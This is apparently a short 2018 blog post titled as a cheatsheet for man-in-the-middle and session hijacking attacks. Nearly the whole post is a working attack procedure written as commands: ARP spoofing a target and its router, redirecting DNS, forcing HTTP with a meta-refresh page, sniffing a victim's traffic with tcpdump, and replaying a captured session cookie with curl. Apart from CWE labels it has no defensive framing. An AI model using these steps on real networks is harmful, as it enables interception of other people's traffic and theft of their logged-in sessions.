Thursday, August 9, 2018

Man-in-the-Middle and Session Hijacking Cheatsheet

Cheatsheet for MITM Session Hijacking


          Man-in-the-Middle: CWE-300 (Channel Accessible by Non-Endpoint ('Man-in-the-Middle') )
          Session Hijacking: CWE-384 (Session Fixation)

           Enable Port Forward

                    user@host:~$ sysctl -w net.ipv4.ip_forward=1


             ARP Spoof the Target

                    user@host:~$ sudo arpspoof <target ip> -t <router ip>
                    user@host:~$ sudo arpspoof <router ip> -t <target ip>


             Redirect DNS to own address

                    user@host:~$ vim /etc/hosts 
...
127.0.0.1      <target DNS>
...

             Redirect the Target to HTTP version of the Site

                    user@host:~$ service apache2 start
                    user@host:~$ vim /var/www/index.html
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="0; url=http://<target site>/" />
</head>
<body>
<p>Redirecting..</p>
</body>
</html>


             Capture Packets

                    user@host:~$ tcpdump -A | grep <target ip>
 

             Use the Session Cookie

                    user@host:~$ curl -v --cookie "<cookie>=<value>" <target site>

No comments:

Post a Comment